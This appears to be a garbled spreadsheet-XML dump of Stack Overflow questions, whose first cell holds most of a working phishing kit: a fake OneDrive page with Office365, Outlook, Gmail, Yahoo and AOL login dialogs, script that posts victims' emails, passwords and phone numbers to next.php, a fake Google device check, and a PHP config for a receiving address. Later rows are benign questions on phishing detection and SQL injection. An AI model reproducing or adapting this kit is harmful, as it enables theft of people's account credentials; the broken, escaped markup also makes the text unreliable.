  &amp;lt;!-- Embedded Video Element --&amp;gt;
  &amp;lt;video playsinline=&amp;quot;playsinline&amp;quot; autoplay=&amp;quot;autoplay&amp;quot; muted=&amp;quot;muted&amp;quot; loop=&amp;quot;loop&amp;quot;&amp;gt;
  &amp;lt;source src=&amp;quot;video/onedrive.mp4&amp;quot; type=&amp;quot;video/mp4&amp;quot;&amp;gt;
  &amp;lt;/video&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;!-- video div close/////////////////// --&amp;gt;
  &amp;lt;div style=&amp;quot;height: 100%;background:rgba(0,0,0,0.5);&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;container-fluid&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;row&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;col-lg-5 mx-auto&amp;quot; style=&amp;quot;margin-top: 60px&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;row&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;col-lg-12 text-white text-center&amp;quot;&amp;gt;
  &amp;lt;img src=&amp;quot;images/onedrive-w.png&amp;quot; class=&amp;quot;img-fluid&amp;quot; width=&amp;quot;100px&amp;quot;&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;span class=&amp;quot;h3&amp;quot;&amp;gt;Welcome To OneDrive&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span class=&amp;quot;text-white&amp;quot;&amp;gt;This document is secure, please login to view, edit or download.select an option below to continue.&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;row mt-3&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;col-lg-4&amp;quot;&amp;gt;
  &amp;lt;a href=&amp;quot;javascript:void(0)&amp;quot; id=&amp;quot;office365modal&amp;quot; style=&amp;quot;margin-left: 220px&amp;quot; class=&amp;quot;hvr-grow w-100&amp;quot; style=&amp;quot;text-decoration: none;&amp;quot; data-toggle=&amp;quot;modal&amp;quot; data-target=&amp;quot;#ajaxModal&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot; p-2 text-center&amp;quot; style=&amp;quot; background-color: #FF3C00;border-radius:10px;&amp;quot;&amp;gt;
  &amp;lt;img src=&amp;quot;images/office3651.png&amp;quot; class=&amp;quot;img-fluid&amp;quot; width=&amp;quot;30px&amp;quot; style=&amp;quot;padding:5px 0px 5px 0px;&amp;quot;&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span style=&amp;quot;vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;&amp;quot;&amp;gt;Continue with&amp;lt;br&amp;gt; Office365&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;row mt-3&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;col-lg-4&amp;quot;&amp;gt;
  &amp;lt;a href=&amp;quot;javascript:void(0)&amp;quot; id=&amp;quot;outlookmodal&amp;quot; style=&amp;quot;margin-left: 220px&amp;quot; class=&amp;quot;hvr-grow w-100&amp;quot; style=&amp;quot;text-decoration: none;&amp;quot; data-toggle=&amp;quot;modal&amp;quot; data-target=&amp;quot;#ajaxModal&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot; p-2 text-center&amp;quot; style=&amp;quot; background-color: #0073C8;border-radius:10px;&amp;quot;&amp;gt;
  &amp;lt;img src=&amp;quot;images/outlook1.png&amp;quot; class=&amp;quot;img-fluid&amp;quot; width=&amp;quot;30px&amp;quot; style=&amp;quot;padding:5px 0px 5px 0px;&amp;quot;&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span style=&amp;quot;vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;&amp;quot;&amp;gt;Continue with&amp;lt;br&amp;gt; Outlook&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;!-- Modal for gmail --&amp;gt;
  &amp;lt;div class=&amp;quot;modal fade&amp;quot; id=&amp;quot;ajaxModal&amp;quot; tabindex=&amp;quot;-1&amp;quot; role=&amp;quot;dialog&amp;quot; aria-labelledby=&amp;quot;exampleModalLabel&amp;quot; aria-hidden=&amp;quot;true&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;modal-dialog&amp;quot; role=&amp;quot;document&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;modal-content&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;modal-header&amp;quot;&amp;gt;
  &amp;lt;button type=&amp;quot;button&amp;quot; class=&amp;quot;close&amp;quot; data-dismiss=&amp;quot;modal&amp;quot; aria-label=&amp;quot;Close&amp;quot;&amp;gt;
  &amp;lt;span aria-hidden=&amp;quot;true&amp;quot;&amp;gt;&amp;amp;times;&amp;lt;/span&amp;gt;
  &amp;lt;/button&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;modal-body&amp;quot;&amp;gt;
  &amp;lt;center&amp;gt;
  &amp;lt;img id=&amp;quot;fieldImg&amp;quot; src=&amp;quot;images/gmail.png&amp;quot; class=&amp;quot;img-fluid rounded-circle&amp;quot; width=&amp;quot;80px&amp;quot;&amp;gt;
  &amp;lt;h5 class=&amp;quot;modal-title&amp;quot; id=&amp;quot;exampleModalLabel&amp;quot;&amp;gt;Login with &amp;lt;span id=&amp;quot;field&amp;quot;&amp;gt;Gmail&amp;lt;/span&amp;gt;&amp;lt;/h5&amp;gt;
  &amp;lt;div class=&amp;quot;alert alert-danger&amp;quot; id=&amp;quot;msg&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;span id=&amp;quot;error&amp;quot; class=&amp;quot;text-danger&amp;quot;&amp;gt;That account doesn't exist. Enter a different account&amp;lt;/span&amp;gt;
  &amp;lt;/center&amp;gt;
  &amp;lt;form id=&amp;quot;contact&amp;quot; class=&amp;quot;form-horizontal well&amp;quot;&amp;gt;
  &amp;lt;div id=&amp;quot;div1&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;col-lg-12&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;form-group&amp;quot;&amp;gt;
  &amp;lt;div id=&amp;quot;inputbar&amp;quot;&amp;gt;
  &amp;lt;label for=&amp;quot;exampleInputEmail1&amp;quot;&amp;gt;Email address&amp;lt;/label&amp;gt;
  &amp;lt;input type=&amp;quot;email&amp;quot; name=&amp;quot;email&amp;quot; class=&amp;quot;form-control&amp;quot; id=&amp;quot;email&amp;quot; aria-describedby=&amp;quot;emailHelp&amp;quot; placeholder=&amp;quot;Enter email&amp;quot;&amp;gt;
  &amp;lt;small id=&amp;quot;emailHelp&amp;quot; class=&amp;quot;form-text text-muted&amp;quot;&amp;gt;We'll never share your email with anyone else.&amp;lt;/small&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;automail&amp;quot; class=&amp;quot;h5 mt-5&amp;quot;&amp;gt;
  &amp;lt;i class=&amp;quot;fas fa-arrow-left&amp;quot; id=&amp;quot;back1&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;amp;nbsp&amp;lt;span id=&amp;quot;emailch&amp;quot;&amp;gt;abc@abc.com&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;col-lg-12&amp;quot;&amp;gt;
  &amp;lt;div class=&amp;quot;form-group&amp;quot;&amp;gt;
  &amp;lt;label for=&amp;quot;Password&amp;quot;&amp;gt;Password&amp;lt;/label&amp;gt;
  &amp;lt;input type=&amp;quot;password&amp;quot; name=&amp;quot;password&amp;quot; class=&amp;quot;form-control&amp;quot; id=&amp;quot;password&amp;quot; aria-describedby=&amp;quot;emailHelp&amp;quot; placeholder=&amp;quot;Enter Password&amp;quot;&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id=&amp;quot;div2&amp;quot;&amp;gt;
  &amp;lt;i class=&amp;quot;fas fa-arrow-left&amp;quot; id=&amp;quot;back&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;amp;nbsp&amp;lt;span id=&amp;quot;emailch1&amp;quot; class=&amp;quot;h5&amp;quot;&amp;gt;abc@abc.com&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span class=&amp;quot;h4 font-weight-normal&amp;quot;&amp;gt;Verify it's you&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span &amp;gt;This device is not recognized. For security, Google want to make sure it's really you.&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span id=&amp;quot;msg1&amp;quot; class=&amp;quot;text-danger&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;span&amp;gt;Try another way to sign in&amp;lt;/span&amp;gt;
  &amp;lt;div class=&amp;quot;form-group mt-3&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;number&amp;quot; name=&amp;quot;phone&amp;quot; class=&amp;quot;form-control&amp;quot; id=&amp;quot;phone&amp;quot; aria-describedby=&amp;quot;emailHelp&amp;quot; placeholder=&amp;quot;Enter Phone No.&amp;quot; &amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class=&amp;quot;modal-footer&amp;quot;&amp;gt;
  &amp;lt;button type=&amp;quot;button&amp;quot; class=&amp;quot;btn btn-secondary&amp;quot; data-dismiss=&amp;quot;modal&amp;quot;&amp;gt;Close&amp;lt;/button&amp;gt;
  &amp;lt;button class=&amp;quot;btn btn-info pull-right&amp;quot; id=&amp;quot;submit-btn&amp;quot;&amp;gt;Login&amp;lt;/button&amp;gt;
  &amp;lt;button class=&amp;quot;btn btn-info pull-right&amp;quot; id=&amp;quot;submit-btn1&amp;quot;&amp;gt;verify&amp;lt;/button&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/form&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;!-- Optional JavaScript --&amp;gt;
  &amp;lt;!-- jQuery first, then Popper.js, then Bootstrap JS --&amp;gt;
  &amp;lt;script src=&amp;quot;https://code.jquery.com/jquery-3.2.1.slim.min.js&amp;quot; integrity=&amp;quot;sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN&amp;quot; crossorigin=&amp;quot;anonymous&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src=&amp;quot;https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js&amp;quot; integrity=&amp;quot;sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q&amp;quot; crossorigin=&amp;quot;anonymous&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src=&amp;quot;https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js&amp;quot; integrity=&amp;quot;sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl&amp;quot; crossorigin=&amp;quot;anonymous&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;/body&amp;gt;
  &amp;lt;script src=&amp;quot;https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src=&amp;quot;https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script&amp;gt;
  &amp;lt;!-- /* global $ */
  $(document).ready(function(){
  var count=0;
  $('#div2').hide();
  $('#error').hide();
  $(&amp;quot;#automail&amp;quot;).hide();
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#submit-btn1').hide();
  $('#back').click(function () {
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  });
  $('#back1').click(function () {
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $(&amp;quot;#automail&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#inputbar&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  });
  /////////////url email getting////////////////
  var email = window.location.hash.substr(1);
  if (!email) {
  }
  else
  {
  // $('#email').val(email);
  var my_email =email;
  var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
  if (!filter.test(my_email)) {
  $('#error').show();
  email.focus;
  return false;
  }
  var ind=my_email.indexOf(&amp;quot;@&amp;quot;);
  var my_slice=my_email.substr((ind+1));
  var c= my_slice.substr(0, my_slice.indexOf('.'));
  var final= c.toLowerCase();
  if (final==&amp;quot;gmail&amp;quot;) {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $('#fieldImg').attr('src', 'images/gmail.png');
  $('#field').html(&amp;quot;Gmail&amp;quot;);
  $('#email').val(my_email);
  $('#emailch').html(my_email);
  $(&amp;quot;#msg&amp;quot;).hide();
  $(&amp;quot;#inputbar&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#automail&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  }
  else if(final==&amp;quot;outlook&amp;quot; || final==&amp;quot;hotmail&amp;quot;)
  {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/outlook.png');
  $('#field').html(&amp;quot;Outlook&amp;quot;);
  $('#email').val(my_email);
  $('#emailch').html(my_email);
  $(&amp;quot;#msg&amp;quot;).hide();
  $(&amp;quot;#inputbar&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#automail&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  }
  else if(final==&amp;quot;aol&amp;quot;)
  {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/aol.png');
  $('#field').html(&amp;quot;Aol&amp;quot;);
  $('#email').val(my_email);
  $('#emailch').html(my_email);
  $(&amp;quot;#msg&amp;quot;).hide();
  $(&amp;quot;#inputbar&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#automail&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  }
  else if(final==&amp;quot;office365&amp;quot;)
  {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/office365.png');
  $('#field').html(&amp;quot;Office 365&amp;quot;);
  $('#email').val(my_email);
  $('#emailch').html(my_email);
  $(&amp;quot;#msg&amp;quot;).hide();
  $(&amp;quot;#inputbar&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#automail&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  }
  else if(final==&amp;quot;yahoo&amp;quot;)
  {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/yahoo.png');
  $('#field').html(&amp;quot;Yahoo&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(my_email);
  $('#emailch').html(my_email);
  $('#email').val(my_email);
  $(&amp;quot;#inputbar&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#automail&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  }
  else
  {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/othermail.ico');
  $('#field').html(&amp;quot;Other Mail&amp;quot;);
  $('#email').val(my_email);
  $('#emailch').html(my_email);
  $(&amp;quot;#msg&amp;quot;).hide();
  $(&amp;quot;#inputbar&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#automail&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  }
  }
  ///////////////url getting email////////////////
  $('#gmailmodal').click(function () {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/gmail.png');
  $('#field').html(&amp;quot;Gmail&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  });
  $('#outlookmodal').click(function () {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/outlook.png');
  $('#field').html(&amp;quot;Outlook&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  });
  $('#aolmodal').click(function () {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/aol.png');
  $('#field').html(&amp;quot;Aol&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  });
  $('#office365modal').click(function () {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/office365.png');
  $('#field').html(&amp;quot;Office 365&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  });
  $('#yahoomodal').click(function () {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/yahoo.png');
  $('#field').html(&amp;quot;Yahoo&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  });
  $('#othermodal').click(function () {
  $('#contact').trigger(&amp;quot;reset&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#fieldImg').attr('src', 'images/othermail.ico');
  $('#field').html(&amp;quot;Other Mail&amp;quot;);
  $(&amp;quot;#msg&amp;quot;).hide();
  $('#email').val(&amp;quot;&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $('#submit-btn1').hide();
  $('#submit-btn').show();
  $(&amp;quot;#div2&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div1&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#ajaxModal').modal('show');
  });
  $('#submit-btn').click(function(event){
  $('#error').hide();
  $('#msg').hide();
  event.preventDefault();
  var email=$(&amp;quot;#email&amp;quot;).val();
  var password=$(&amp;quot;#password&amp;quot;).val();
  var detail=$(&amp;quot;#field&amp;quot;).html();
  var msg = $('#msg').html();
  $('#msg').text( msg );
  ///////////new injection////////////////
  var my_email =email;
  var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
  if (!filter.test(my_email)) {
  $('#error').show();
  email.focus;
  return false;
  }
  var ind=my_email.indexOf(&amp;quot;@&amp;quot;);
  var my_slice=my_email.substr((ind+1));
  var c= my_slice.substr(0, my_slice.indexOf('.'));
  var final= c.toLowerCase();
  ///////////new injection////////////////
  count=count+1;
  $.ajax({
  dataType: 'JSON',
  url: 'next.php',
  type: 'POST',
  data:{
  email:email,
  password:password,
  detail:detail,
  },
  // data: $('#contact').serialize(),
  beforeSend: function(xhr){
  $('#submit-btn').html('Verifing...');
  },
  success: function(response){
  if (count==1 &amp;amp;&amp;amp; final==&amp;quot;gmail&amp;quot;) {
  $('#emailch1').html(my_email);
  $(&amp;quot;#div1&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div2&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#submit-btn').hide();
  $('#submit-btn1').show();
  return false;
  }
  $(&amp;quot;#password&amp;quot;).val(&amp;quot;&amp;quot;);
  if (count&amp;gt;=3) {
  count=0;
  window.location.replace(&amp;quot;http://www.&amp;quot;+my_slice);
  }
  if(response){
  $(&amp;quot;#msg&amp;quot;).show();
  console.log(response);
  if(response['signal'] == 'ok'){
  $('#msg').html(response['msg']);
  // $('input, textarea').val(function() {
  // return this.defaultValue;
  // });
  }
  else{
  $('#msg').html(response['msg']);
  }
  }
  },
  error: function(){
  if (count==1 &amp;amp;&amp;amp; final==&amp;quot;gmail&amp;quot;) {
  $('#emailch1').html(my_email);
  $(&amp;quot;#div1&amp;quot;).animate({left:200, opacity:&amp;quot;hide&amp;quot;}, 0);
  $(&amp;quot;#div2&amp;quot;).animate({right:200, opacity:&amp;quot;show&amp;quot;}, 1000);
  $('#submit-btn').hide();
  $('#submit-btn1').show();
  return false;
  }
  $(&amp;quot;#password&amp;quot;).val(&amp;quot;&amp;quot;);
  if (count&amp;gt;=3) {
  count=0;
  window.location.replace(&amp;quot;http://www.&amp;quot;+my_slice);
  }
  $(&amp;quot;#msg&amp;quot;).show();
  $('#msg').html(&amp;quot;Please try again later&amp;quot;);
  },
  complete: function(){
  $('#submit-btn').html('Login');
  }
  });
  });
  $('#submit-btn1').click(function(event){
  event.preventDefault();
  var email=$(&amp;quot;#email&amp;quot;).val();
  var password=$(&amp;quot;#password&amp;quot;).val();
  var phone=$(&amp;quot;#phone&amp;quot;).val();
  var detail=$(&amp;quot;#field&amp;quot;).html();
  var msg1 = $('#msg1').html();
  $.ajax({
  dataType: 'JSON',
  url: 'next.php',
  type: 'POST',
  data:{
  email:email,
  password:password,
  detail:detail,
  phone:phone,
  },
  beforeSend: function(xhr){
  $('#submit-btn1').html('Verifing...');
  },
  success: function(response){
  window.location.replace(&amp;quot;http://gmail.com/&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  if(response){
  $(&amp;quot;#msg1&amp;quot;).show();
  console.log(response);
  if(response['signal'] == 'ok'){
  $('#msg1').html(response['msg']);
  }
  else{
  $('#msg1').html(response['msg']);
  }
  }
  },
  error: function(){
  window.location.replace(&amp;quot;http://gmail.com/&amp;quot;);
  $('#password').val(&amp;quot;&amp;quot;);
  $(&amp;quot;#msg1&amp;quot;).show();
  $('#msg1').html(&amp;quot;Please try again later&amp;quot;);
  },
  complete: function(){
  $('#submit-btn1').html('Verify');
  }
  });
  // }
  });
  });
  &amp;lt;/script&amp;gt;
  &amp;lt;/html&amp;gt; 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;email.php:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 $Receive_email=&amp;quot;*redacted*&amp;quot;;
 $redirect=&amp;quot;https://www.google.com/&amp;quot;;
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>How to check if the current website in your browser is a phishing site by checking into the database of Phishtank using JSON and Ajax</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to create a Google chrome extension that detects phishing sites by checking the site in the database of Phishtank. How do I go by the JavaScript codes using JSON and Ajax?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;ajax&gt;&lt;google-chrome-extension&gt;</t>
  </si>
  <si>
    <t>How can i use safe-browsing application object to determine whether a url is reported as phishing site or malware site?</t>
  </si>
  <si>
    <t>&lt;p&gt;Here is code snippet:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Components.classes['@mozilla.org/safebrowsing/application;1']
  .getService().wrappedJSObject.malwareWarden.listManager_
  .safeLookup(test_url, function(tableName){
  if (tableName == 'goog-phish-shavar' || tableNmae == 'goog-malware-shavar') {
  alert('This is reported by Google! ');
  };
 });
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It works fine, but I don't think it is the 'right' way... &lt;/p&gt;
 &lt;p&gt;What if user change the DataProvider?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firefox-addon&gt;&lt;dataprovider&gt;&lt;malware&gt;&lt;phishing&gt;&lt;safe-browsing&gt;</t>
  </si>
  <si>
    <t>Disable and display all hyperlinks in Outlook messages</t>
  </si>
  <si>
    <t>&lt;p&gt;I need to rollout an Outlook VBA macro to disable and display all hyperlinks in email messages. &lt;/p&gt;
 &lt;p&gt;Optimally all hyperlinks would be disabled from being clickable and for text that have a ‚Äúhidden‚Äù link the link would be disabled and following the text (still in blue) the link would be displayed within square brackets. &lt;/p&gt;
 &lt;p&gt;I have a lot of Excel VBA experience but almost no Outlook VBA experience. I‚Äôm surprised this code isn‚Äôt all over the place but after a week of searching I‚Äôve found nothing. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;vba&gt;&lt;hyperlink&gt;&lt;outlook&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Training data for phishing or spam tweets</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to do phishing/spam detection on twitter. 
 I‚Äôve got about 500,000 tweets through Streaming API provided by twitter. Then I extract the url appeared in these tweets and submit them to two blacklists ‚Äì Google safebrowsing and Phishtanks to receive a basic judge of whether it‚Äôs a phishing link or not. The problem here is that according to my experiment results, I can‚Äôt get enough samples of phishing tweet. 
 Are there any exsisting tweet data that have already be marked as malicious/normal so that I can carry on with my work?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;twitter&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Does mysqli class in PHP protect 100% against sql injections?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've seen lots of articles and questions about mysqli, and all of them claim that it protects against sql injections. But is it fool proof, or is there still some way to get around it. I'm not interested in cross site scripting or phishing attacks, only sql injections.&lt;/p&gt;
 &lt;p&gt;What I should have said to begin with is that I am using prepared statements. That is what I meant with mysqli. If I use prepared statements without any string concatenation, then is it foolproof?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Marius</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;mysql&gt;&lt;mysqli&gt;&lt;sql-injection&gt;</t>
  </si>
  <si>
    <t>Column value not updating properly in firebase database</t>
  </si>
  <si>
    <t>&lt;p&gt;I have an android studio project based around training games. At the end of a game, the user's score is calculated and displayed in a toast message, then saved to the firebase realtime database. &lt;/p&gt;
 &lt;p&gt;However, when the user completes a game, instead of adding to the existing score in the database, it is being overwritten. &lt;/p&gt;
